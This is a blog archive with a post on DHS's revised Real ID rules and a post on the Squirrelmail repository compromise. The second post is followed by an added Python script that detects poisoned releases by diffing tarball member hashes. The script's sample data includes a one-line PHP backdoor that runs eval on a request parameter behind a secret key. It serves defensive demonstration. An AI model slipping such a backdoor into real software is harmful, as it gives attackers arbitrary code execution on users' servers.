Blog Archives

DHS issues revised “Real ID” regulations

The Department of Homeland Security has released revised “Real ID” regulations, 284 pages long. While in government jargon these are the “final” regulations, the first compliance deadline has now been pushed back to December 31, 2009, so there’s still plenty of opportunity for Congress to act and change things.

Their press release now spins the system as “preventing document fraud”, and talks more about the costs of identity theft than it does about terrorism, which is pretty amusing in light of Privacy Rights Clearinghouse’s “Real ID Act will increase exposure to identity theft”. It also trumpets substantial cost savings, which it attributes primarily to revisions giving the states “greater flexibility in issuing licenses to older Americans”. Flexibility is a good thing, but it’ll be interesting to see what new holes they’ve introduced for terrorists and identity thieves to exploit.

I’ve blogged in the past on this issue on the Stop “Real ID” Now! blog, and will be updating it with links to analyses from the press and civil liberties organizations as they come out.




Poisoning squirrels in the repository

Slashdot’s linked to a bunch of good stories on computer security recently. “Squirrelmail repository poisoned” has the catchiest title, and it’s about squirrels, so it goes first.

What happened was that an intruder got into the site where you download Squirrelmail and introduced a very subtle change to the code: a backdoor that would let anybody who knew about it (the intruder, or anybody he or she told or sold the secret to) run whatever code they wanted on the server. The announcement called it “an arbitrary code execution risk”; the slang is “pwning”; both are security speak for “doing whatever you want to on the system”. Anybody who downloaded from the poisoned site while the change was in place got the backdoor along with the software.

YOW! Dreamhost, my ISP, provides a nice one-click install for Squirrelmail (“webmail for nuts!”) and I use it on a couple of my domains. Maybe somebody’s used this to hack in — and that’s why my colors keep intermittently changing from pink to blue! Hmm, well, probably not … although other than the unsatisfyingly generic “intermittent software bug” it’s the best explanation so far.

Imagine, though, that this was a political candidate’s blog; and that the hack gets exploited to delete a random 10% of mail from potential supporters and voters. This might not get noticed for a while … and if it went on long enough, it could easily lead to enough impact to swing a close election. Or suppose there’s a mass-mailing from the account to everybody in the district the day before the election: “This account has been hacked, can you really trust this bozo?” Hmm. Talk about your social engineering attacks.

It’s also another interesting example of the “security as a social science” theme, and more specifically of the process issues for web services that came up in How’d that get through QA? Something that’s really encouraging is that in both cases the software providers did exactly the right thing, including being transparent about what had happened: Squirrelmail’s blog shows how quickly they reacted, announcing immediately and getting the fix out within a day.
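The practical check against a poisoned download like the one described above is to compare the copy you fetched against a trusted copy (a mirror, a signed release, or the digest the project published) member by member, so the one altered file stands out. The script below is an added example for this post, not Squirrelmail’s own code and not part of the original entry: it builds two small tarballs in memory, a clean release and a copy with a one-line backdoor, and reports exactly which member differs. The file names, the “webmail-1.0” package name and the backdoor itself are constructed for illustration.

```python
"""Spot a poisoned release by diffing two copies of the same tarball.

Added example (not Squirrelmail's code). When a download site is compromised,
the tarball it serves and a known-good copy disagree in one or a few members.
Hashing every member and diffing the two hash maps points straight at the
change, and a whole-file digest check catches the swap before anything is
extracted at all.
"""
import hashlib
import hmac
import io
import tarfile


def member_hashes(tar_bytes: bytes) -> dict:
    """Map each regular file inside a .tar.gz to the SHA-256 of its contents."""
    hashes = {}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                data = tar.extractfile(member).read()
                hashes[member.name] = hashlib.sha256(data).hexdigest()
    return hashes


def diff_releases(trusted: bytes, suspect: bytes) -> dict:
    """Return members that were changed, added or removed in the suspect copy."""
    a, b = member_hashes(trusted), member_hashes(suspect)
    return {
        "changed": sorted(n for n in a if n in b and a[n] != b[n]),
        "added": sorted(n for n in b if n not in a),
        "removed": sorted(n for n in a if n not in b),
    }


def verify_sha256(tar_bytes: bytes, expected_hex: str) -> bool:
    """Check a whole tarball against a published digest, comparing in constant time."""
    actual = hashlib.sha256(tar_bytes).hexdigest()
    return hmac.compare_digest(actual, expected_hex)


def build_tarball(files: dict) -> bytes:
    """Build a .tar.gz in memory from {path: bytes}. Used only for constructed data."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed sample data: a clean release and a copy with a one-line backdoor.
# Names and contents are invented for this example, not from the real incident.
CLEAN_FILES = {
    "webmail-1.0/index.php": b"<?php\nrequire 'functions/mail.php';\n",
    "webmail-1.0/functions/mail.php": b"<?php\nfunction send_mail($to) {\n  return true;\n}\n",
}
POISONED_FILES = dict(CLEAN_FILES)
POISONED_FILES["webmail-1.0/functions/mail.php"] = (
    b"<?php\n"
    b"function send_mail($to) {\n"
    # The backdoor: anyone who knows the secret parameter runs arbitrary PHP.
    b"  if (isset($_GET['k']) && $_GET['k'] == 's3cret') { eval($_GET['c']); }\n"
    b"  return true;\n}\n"
)

CLEAN_TARBALL = build_tarball(CLEAN_FILES)
POISONED_TARBALL = build_tarball(POISONED_FILES)


def demo() -> dict:
    """Run both checks; only the backdoored member is reported as changed."""
    report = diff_releases(CLEAN_TARBALL, POISONED_TARBALL)
    # The published digest belongs to the clean copy, so the poisoned one fails.
    published = hashlib.sha256(CLEAN_TARBALL).hexdigest()
    report["poisoned_matches_published_digest"] = verify_sha256(POISONED_TARBALL, published)
    return report


if __name__ == "__main__":
    print(demo())
```

The whole-file digest only helps if the published digest lives somewhere the intruder could not also edit (a signed announcement, a separate mirror); a checksum sitting next to the tarball on the same compromised site proves nothing. The member-by-member diff is what tells you where to look once you know the two copies disagree.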

